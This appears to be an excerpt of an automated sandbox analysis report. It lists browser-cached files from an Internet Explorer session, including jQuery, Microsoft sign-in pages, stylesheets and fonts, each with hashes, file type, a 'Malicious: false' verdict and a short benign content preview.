SHA-512: 53C5F2F2B9AD8B555F9AE6644941CF2016108E803EA6AB2C7418E31E66874DEA5A2BC04BE0FA9766E7206617879520E730E9E3E0DE136BAE886C2E786082D622
Malicious: false
Reputation: moderate, very likely benign file
Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css">.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can’t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:getInfo();">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can’t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>.. <l
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\dnserrordiagoff[2]
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes): 1678
Entropy (8bit): 4.566317707595381
Encrypted: false
MD5: 7E81A79F38695E467A49EE41DD24146D
SHA1: 035E110C36BF3072525B05394F73D1BA54D0D316
SHA-256: A705D1E0916A79B0D6E60C41A9CE301ED95B3FC00E927F940AB27061C208A536
SHA-512: 53C5F2F2B9AD8B555F9AE6644941CF2016108E803EA6AB2C7418E31E66874DEA5A2BC04BE0FA9766E7206617879520E730E9E3E0DE136BAE886C2E786082D622
Malicious: false
Reputation: moderate, very likely benign file
Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css">.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can’t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:getInfo();">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can’t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>.. <l
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\ellipsis_white[1].svg
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: SVG Scalable Vector Graphics image
Size (bytes): 22356
Entropy (8bit): 6.694074336333653
Encrypted: false
MD5: 5CFA4099FDF578C66B0BDD5ED7863EA2
SHA1: F7655793E88D1A769F5CCF472870AB5CD503C597
SHA-256: 17A4AE07EF1009A19AA43AAAB3CBD803CB1E043D92E6700833F0E9DA7DB65403
SHA-512: 6AA8068CC945481D4392D531AD7E5E45F9B8A00ED9064C3D376A4984F33445DE48D283F1A699C870FE97A484EA02C2A65DB9214202C9E7F4816BBA7D4A6131D0
Malicious: false
Reputation: low
Preview: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path fill="#ffffff" d="M1.143,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.107,1.107,0,0,1-.446.089A1.107,1.107,0,0,1,.7,9.054a1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893A1.164,1.164,0,0,1,.7,6.946a1.107,1.107,0,0,1,.446-.089M8,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,8,6.857m6.857,0a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,14.857,6.857Z"/></svg>623,1.381,5.212,5.212,0,0,1,1.3,3.729,5.257,5.257,0,0,1-1.386,3.83,5.019,5.019,0,0,1-
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\jquery-3.3.1.min[1].js
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines
Size (bytes): 86927
Entropy (8bit): 5.289226719276158
Encrypted: false
MD5: A09E13EE94D51C524B7E2A728C7D4039
SHA1: 0DC32DB4AA9C5F03F3B38C47D883DBD4FED13AAE
SHA-256: 160A426FF2894252CD7CEBBDD6D6B7DA8FCD319C65B70468F10B6690C45D02EF
SHA-512: F8DA8F95B6ED33542A88AF19028E18AE3D9CE25350A06BFC3FBF433ED2B38FEFA5E639CDDFDAC703FC6CAA7F3313D974B92A3168276B3A016CEB28F27DB0714A
Malicious: false
Reputation: moderate, very likely benign file
Preview: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode text, with very long lines
Size (bytes): 96649
Entropy (8bit): 5.297804550899051
Encrypted: false
MD5: E55ECB02E7376CD010C764107EBD513F
SHA1: FA6D184DF01EC535628DC8FAF38211591BAADFC8
SHA-256: 5776881753B95A0ABE5D1F6EFE3ABE7B83A3265EACCD117DD948E523C044600C
SHA-512: 099C665E1CEE8DF9C5D5C340A14170341BD29E0321875FF08E594B750CFDBF2CA8C9B45B584FCA21F87CBE6CD8A170918CECFF8C9796AAFA3D89F0AA97509ABD
Malicious: false
Reputation: moderate, very likely benign file
Preview: /*!. * jQuery JavaScript Library v1.10.2. * http://jquery.com/. *. * Includes Sizzle.js. * http://sizzlejs.com/. *. * Copyright 2005, 2013 jQuery Foundation, Inc. and other contributors. * Released under the MIT license. * http://jquery.org/license. *. * Date: 2013-07-03T13:48Z. */.!function(e,t){function n(e){var t=e.length,n=ct.type(e);return ct.isWindow(e)?!1:1===e.nodeType&&t?!0:"array"===n||"function"!==n&&(0===t||"number"==typeof t&&t>0&&t-1 in e)}function r(e){var t=kt[e]={};return ct.each(e.match(pt)||[],function(e,n){t[n]=!0}),t}function i(e,n,r,i){if(ct.acceptData(e)){var o,a,s=ct.expando,u=e.nodeType,l=u?ct.cache:e,c=u?e[s]:e[s]&&s;if(c&&l[c]&&(i||l[c].data)||r!==t||"string"!=typeof n){return c||(c=u?e[s]=tt.pop()||ct.guid++:s),l[c]||(l[c]=u?{}:{"toJSON":ct.noop}),("object"==typeof n||"function"==typeof n)&&(i?l[c]=ct.extend(l[c],n):l[c].data=ct.extend(l[c].data,n)),a=l[c],i||(a.data||(a.data={}),a=a.data),r!==t&&(a[ct.camelCase(n)]=r),"string"==typeof n?(o=a[n],null==o&&(o=
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Size (bytes): 284727
Entropy (8bit): 5.445836715201731
Encrypted: false
MD5: DCD7AA5F0622498CCC7149AE551D05C4
SHA1: 793500F4E007A374806281DEEE883BBB025964B6
SHA-256: 00F339738C54CF7FB233C1EC171306FD95F90030B51AB92A2F91030EF7BDF24B
SHA-512: 6B9431E03962B2DEEC78B63BB8A8842A181752F2828F38F5B3807AD40A3BE224E65C9EBF80B1F3C953509C325B861C4F4377B4B9289A4570A30EA4B61AF157C6
Malicious: false
Reputation: low
Preview: /*!------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------....This file is based on or incorporates material from the projects listedbelow (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise. .... * Knockout JavaScript library v3.3.0.. * (c) Steven Sanderson - http://knockoutjs.com/.. * License: MIT (http://www.opensource.org/licenses/mit-license.php)....Provided for Informational Purposes Only....MIT License ....Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the Software)
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\microsoft_logo[1].svg
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: SVG Scalable Vector Graphics image
Size (bytes): 1269
Entropy (8bit): 4.111137762573903
Encrypted: false
MD5: 96CB8CEA30D947C962FA2CF959F23890
SHA1: FE2C6762A50C9E4B695AD2DA64663E73F98FE890
SHA-256: 5306E406F5B7B320D6CC69ECF511A3B606058844BC163249781986CBD03E3721
SHA-512: 1191A962C945FBFA4CE9A99B51BB1651BE54DDF221896B37B7001323C35E9672035291332AED39918009B93B57F7D1BEDE4C3205DE14B01C4538E7F20C57C1A3
Malicious: false
Preview: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\script[1].js
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode text, with very long lines, with no line terminators
Size (bytes): 171715
Entropy (8bit): 5.325926407045175
Encrypted: false
MD5: C3990846C6D6520733D90A210187FEE5
SHA1: 98E8BBE9C67C53BBE501557FDA3E7D44100F2794
SHA-256: ADEED61C97600E999A2773C89A4D906711C6EC77BD5C8493A2F3C10FB357983D
SHA-512: 6F9BF6D86428A781D09B063F89679C5E9ED5AA4E17E249F2F44D1793B6382B1659EADC1CB57321FFF4F49C6FAC38BC03FAF11479115D64F390EED0A7589CC084
Malicious: false
Preview: function ShowSelectedComponentKeyPress(n,t){if(window.event.keyCode==13)return ShowSelectedComponent(n,t),!1}function ShowHighLight(n){var t=$("#div"+n).height();$.browser.msie&&parseInt($.browser.version,10)==7?$("#div"+n+" > .highlight").css({width:"0",height:"0","background-color":"white",float:"left","border-top":Math.round(t/2+.3)+"px solid white","border-right":"0.75em solid "+$("#div"+n).css("background-color"),"border-bottom":Math.round(t/2+.3)+"px solid white"}):$("#div"+n+" > .highlight").css({width:"0",height:"0","background-color":"white",float:"left","border-top":t/2+.3+"px solid white","border-right":"0.75em solid "+$("#div"+n).css("background-color"),"border-bottom":t/2+.3+"px solid white"})}function SetRightSideNavigationMenuHeight(){$("[id^=dvModuleGroup_]").hide();window.location.search.toLowerCase().indexOf("bookmarkid")!=-1&&SelectBookMark();window.location.search.toLowerCase().indexOf("componentid")!=-1&&LoadSelectedInternalLink();$(".div_side_comp").length>0&&$(".
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\signup[1].htm
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: HTML document, ASCII text, with very long lines, with CRLF, LF line terminators
Size (bytes): 110160
Entropy (8bit): 5.15728771558402
Encrypted: false
MD5: E83E402C620D96BDC6DC1A8F13A1F798
SHA1: 899E07DA59CD71FBB33C1B6203494F574320F115
SHA-256: 0AFA5CA70FE738B17AEC5D279BE7F491AA248EDEA77D88A5431E3348FD735D98
SHA-512: 17D7D7A9158F94F45D16DC7D24F4CA2DECB894FB752E539FBAF98EDA2872005D85249E25DE06802C3BEAF4E348D3F9F4BF03FDBF4A89FF4AF6B6793CBB8ECEB2
Malicious: false
Preview: .. Copyright (C) Microsoft Corporation. All rights reserved. -->....<!DOCTYPE html>..<html lang="en" xml:lang="en" class="m_ul" dir="ltr" style="">.. <head>.. <link rel="preconnect" href="https://uhf.microsoft.com" >..<link rel="preconnect" href="https://acctcdn.msauth.net" crossorigin>..<link rel="preconnect" href="https://acctcdn.msauth.net" crossorigin>..<meta http-equiv="x-dns-prefetch-control" content="on">..<link rel="dns-prefetch" href="//uhf.microsoft.com">..<link rel="dns-prefetch" href="//wut.smartscreen.microsoft.com">..<link rel="dns-prefetch" href="//acctcdn.msauth.net">..<link rel="dns-prefetch" href="//acctcdnmsftuswe2.azureedge.net">..<link rel="dns-prefetch" href="//acctcdnvzeuno.azureedge.net">.... <title>Microsoft account</title>.. <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, minimum-scale=1.0, user-scalable=yes"/><meta name="format-detection"
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\51-6d3a1e[1].css
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode text, with very long lines
Size (bytes): 149391
Entropy (8bit): 5.055058698445385
Encrypted: false
MD5: F375A2C25F0E94DB19E607E07F2C4B47
SHA1: 38949C3F25DDD1E56DE5501FF84F4A6D07F2A6BF
SHA-256: 28C68FD8C3D21374261E3A1CD672AA551F01C0B04C2F49C1B53DF95F6D1CDD7B
SHA-512: DF7A83E40093BAD3E594CFA991FFBC7DDB36AAD64FA4F46F4C36EBD4ACDF2BB965432D73A67138B0EEDC18B6FD396369EF0B4DD66CAFBA181CD149725A4A8DF3
Malicious: false
Preview: @charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\converged.v2.login.min_bxeixgi3llnj-nuc4-xqwa2[1].css
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines
Size (bytes): 100774
Entropy (8bit): 5.305482238693464
Encrypted: false
MD5: 6F11225E02372CB349FA7B9CE3E5EAC0
SHA1: A6773684CB3501A34BDC560A3173262E879FF3A8
SHA-256: 21CC48423EE47207382CC9C1C3885913079BE17805E6FF81E76E0E7165CA32CD
SHA-512: 1AD8016439C16B967BAB4BB3A580B0A0A6696253C29B49A45C096BDD93F6E860F97084D188181A68C5D5B09482042966681AD8CD0E6E81564FD594B507570C7D
Malicious: false
Preview: /*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file isbased on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise...//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 TwiInc..Permission is hereby granted, free of charge, to any person
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\convergedbg_small_v2_Z9GCPpM7FVE8hxRSZUez6g2[1].jpg
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: JPEG image data, baseline, precision 8, 50x28, frames 3
Size (bytes): 286254
Entropy (8bit): 7.961526577350427
Encrypted: false
MD5: ABA046173F6291AF45F08FD4FBC6386D
SHA1: 453FF1D21D7998626B0E9A107ED9623BAAC998D9
SHA-256: D775B46CE0CEA4773C163A56DC52DAA5DDBCE0BAC7D24B57B8DAC50A66419989
SHA-512: 1F2757149A691BD5338541599FC2980934433B588598FCF8254C9E9D6B15BD59902CF4A2190CF46906404E5ACF54C500A89DA9AF12D4C841827446DBADD31351
Malicious: false
Preview: .....Phttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about=""/> </rdf:RDF> </x:xmpmeta>
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\dropdown_caret_KXSZjGsyILZaoTf0sI9X-A2[1].svg
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: SVG Scalable Vector Graphics image
Size (bytes): 224
Entropy (8bit): 5.066130335315081
Encrypted: false
MD5: 2974998C6B3220B65AA137F4B08F57F8
SHA1: F4F08DA689179DE68EE40CD12ECDCC5AC54B3979
SHA-256: 96D52BD03E244A44931A541A807067792D638DD29EC14A87A78F2BE85D12D19A
SHA-512: 6B4F2439CA99109A7C97828E5972A8E7C7FCA3745B2FB4738EBD9329A99234A8CD3BC4C0C48B5BAA917D4BAA64CDAEB5D74456DEFDDDA3E07FAA803283BE0287
Malicious: false
Preview: <svg xmlns="http://www.w3.org/2000/svg" width="36" height="36" viewBox="0 0 36 36"><title>assets</title><path d="M18,22.484l-8-8,.969-.968L18,20.547l7.031-7.031.969.968-8,8Z"/><rect width="36" height="36" fill="none"/></svg>
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\errorPageStrings[1]
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes): 4720
Entropy (8bit): 5.164796203267696
Encrypted: false
MD5: D65EC06F21C379C87040B83CC1ABAC6B
SHA1: 208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256: A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512: 8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious: false
Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\jquery-1.11.2.min[1].js
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines
Size (bytes): 95931
Entropy (8bit): 5.394232486761965
Encrypted: false
MD5: 5790EAD7AD3BA27397AEDFA3D263B867
SHA1: 8130544C215FE5D1EC081D83461BF4A711E74882
SHA-256: 2ECD295D295BEC062CEDEBE177E54B9D6B19FC0A841DC5C178C654C9CCFF09C0
SHA-512: 781ACEDC99DE4CE8D53D9B43A158C645EAB1B23DFDFD6B57B3C442B11ACC4A344E0D5B0067D4B78BB173ABBDED75FB91C410F2B5A58F71D438AA6266D048D98A
Malicious: false
Preview: /*! jQuery v1.11.2 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.2",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\latest[1].eot
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: Embedded OpenType (EOT), Segoe UI Semibold family
Size (bytes): 30643
Entropy (8bit): 7.976822258863597
Encrypted: false
MD5: E812BA8B7E2A657F2B70CFACE93C7682
SHA1: 2F02CDDBB483F9B11BBBE74C3CA917A4C345FBAD
SHA-256: 3330C1DEAC468874238DD0C6BF902179A8731EDA8A208C7D01DAC0AB1EAE1BC9
SHA-512: 354B2DB12BC1D67F26F94352B0B663DAD64C46C107454FC19CFEA01C54BB09340BC26C06DE1B96FF826F5287CE246A6317722BAE41B72B63BA86FDAF844BA94E
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\latest[2].eot
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: Embedded OpenType (EOT), Segoe UI Light family
Size (bytes): 69595
Entropy (8bit): 7.992327121754015
Encrypted: true
MD5: 72010CDB678FBB4CAB5FE12406D7F5EF
SHA1: E7F06A3C0A88250845E14310A24CE209A7695BBC
SHA-256: 22BA31E135F725FF091E11C15EC3103465E3CB5FDCC736413CBBE2F441054638
SHA-512: 84B5E6BC5763A81592F3BE4AB08864540CCD9699DBD3090A4382AB458D191901D9889D8753CDC2952C3F2DCEF954F11E152C330D0915DFC3571221653107BA3D
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\mwfmdl2-v3.07[1].woff
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: Web Open Font Format, TrueType, length 22376, version 0.0
Size (bytes): 22376
Entropy (8bit): 7.978063740714443
Encrypted: false
MD5: DAE68C4A8AAC30A0C75731AA3C7553F3
SHA1: 4E662B5F83B7F10E297A825072AAF87EE01E9FCC
SHA-256: 7F31CBB16DD8190854789BD1B43F15AE60940FB79AFBB7CFBEF664E12F8A247C
SHA-512: 20433B4530D557D360F9ED51B1DD1DE0C6EEC97B33E880D45898FBAF308A51A73104D04293CDA1959ABCA5C787BB0B2AE50DBA2576CC12D2816ADC74CD9B27E8
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\privacystatement[1].htm
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Size (bytes): 262788
Entropy (8bit): 4.719009857910025
Encrypted: false
MD5: 3850E04FBF51070B1AE70482472A8998
SHA1: 5136F76A01B24FE8D887CB5E4AE4D6490456811C
SHA-256: D20B8DF276BB85BC6D8D58F0BF2724B761C162B91428F4FBB3A3E14E748A4E26
SHA-512: 60E6418E613BBDC361DACC689DF108CFD31B214215EDD9CE8804497AFAD872FDA1ACBB6ED033173EABA888E82BF737A619923F9CF0245C76CEE7363788E17AFA
Malicious: false
Preview: .<!DOCTYPE html ><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext" xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="shortcut icon" href="https://www.microsoft.com/favicon.ico?v2" /><script type="text/javascript" src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.11.2.min.js">.....// Third party scripts and code linked to or referenced from this website are licensed to you by the parties that own such code, not by Microsoft. See ASP.NET Ajax CDN Terms of Use - http://www.asp.net/ajaxlibrary/CDN.ashx... </script><script type="text/javascript" language="javascript">/*<![CDATA[*/if($(document).bind("mobileinit",function(){$.mobile.autoInitializePage=!1}),navigator.userAgent.match(/IEMobile\/10\.0/)){var msViewportStyle=document.createElement("style");msViewpo
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\reprocess[1].htm
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Size (bytes): 16399
Entropy (8bit): 5.53187594715885
Encrypted: false
MD5: 39ACCF5CA385E64C9F9EAE801DF34CAF
SHA1: 1F6EFA75F54F5A08E18FDC4C5F122EE725916932
SHA-256: 9D7213DFAA186B9D7620B57151FE3BE007678AEC0DAC0D24205448B83F300279
SHA-512: FF1CE433DB26D9079E05CE28ED35FEC482920D22F1CC16B44EB1094689D421C026E932501C378D2E3C6BD1D48F8407DA75225459963F4A9D99808612D422C6A7
Malicious: false
Preview: ....<!DOCTYPE html>..<html dir="ltr" class="" lang="en">..<head>.. <title>Sign in to your account</title>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">.. <meta http-equiv="Pragma" content="no-cache">.. <meta http-equiv="Expires" content="-1">.. .. <meta name="PageID" content="ConvergedError" />.. <meta name="SiteID" content="" />.. <meta name="ReqLC" content="1033" />.. <meta name="LocLC" content="en-US" />.. <noscript>.. <meta http-equiv="Refresh" content="0; URL=" />.. </noscript>.... .. <link rel="shortcut icon" href="https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico" />.. .. <meta name="robots" content="none" />....<script type="text/javascript">//<![CDATA[.$Config={"strHeaderText":"Sign in","uns
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\style[1].css
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines, with no line terminators
Size (bytes): 816
Entropy (8bit): 4.949897846622861
Encrypted: false
MD5: 853BD04891E53E62DCC5EB93DC2D895E
SHA1: 7A77B42B76C1DCA1A526273E7A18738020E0290B
SHA-256: 26F6807B674D6A4CAAEDA21C3E3A5DAF0A018828FF045026B6306E9414EE0E47
SHA-512: FEEA2A298EB9B6EDD0CF5DC3D6473B9F280409147E4722D87C898ACC344566543CCDE986EA1CDBF717EEFF943147C8BC03C7FCF86A386EA4D62211A1E55B0D93
Malicious: false
